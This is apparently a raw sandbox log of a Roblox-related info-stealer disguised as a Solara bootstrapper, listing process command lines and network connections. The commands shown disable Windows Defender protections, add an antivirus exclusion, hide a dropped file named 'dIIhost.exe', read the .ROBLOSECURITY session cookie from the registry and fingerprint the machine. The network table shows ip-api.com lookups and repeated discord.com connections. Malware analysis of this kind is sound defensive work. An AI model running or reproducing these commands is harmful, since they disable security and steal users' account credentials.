\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
